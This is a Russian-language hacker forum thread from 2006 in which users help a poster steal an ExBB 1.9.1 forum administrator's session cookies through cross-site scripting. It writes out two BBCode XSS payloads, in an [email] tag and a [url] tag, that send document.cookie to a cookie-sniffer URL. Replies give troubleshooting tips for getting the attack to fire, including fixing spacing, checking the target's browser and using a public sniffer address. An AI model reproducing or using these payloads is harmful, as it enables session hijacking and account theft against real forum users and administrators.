Просмотр полной версии : Вопрос по применению XSS на форуме ExBB 1.9.1
Пробывал:
[ email]'style='display:none;background:url(javascript:doc ument.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите? :D
http://you_sniffer_url/sniffer.php а чё так и оставил?
А что тебе админ должен прислать=)
Куки должны были тебе слиться, на сниффер который ты указал, если ты это сделал... Только убери пробел между doc и ument и в конце поставь ] ну и конешно путь к сниферу например античатовскому "http://antichat.ru/cgi-bin/s.jpg" Если будет работать то тебе должны будут первыми прийти твои куки если ты там зареген...
лол :) бывает и такое)
короче вот еще один. используется также как и твой
[*url]http:/*/sasa'style=background:url("javascript:document.images[0].src='http://antichat.org/s/ТВАЙ_СНИФАК.gif?'+document.cookie");lol:'sa[*/url]
зы: * * * убери
Trampled_clover нет конечно снифер подставил и все пробелы убрал!
Trampled_clover нет конечно снифер подставил и все пробелы убрал!
А скобку не закрыл?
А может у него не ОСЛИК ? поэтому не шлёт .Если я не ошибаюсь этот XSS только для ИЕ браузера.
podkashey
27.02.2006, 03:08
ггыгыгы.... У меня 2 варианта ответа:
1)А может у него не ОСЛИК согласен с этим (Ослик - интернет эксплорер).
2) Админ умный и форум пропатчен.
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите? :D
Покажи как выглядит результат скрипта в HTML
milord69
28.02.2006, 18:24
В 7 ИЕ куки не тырятся
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot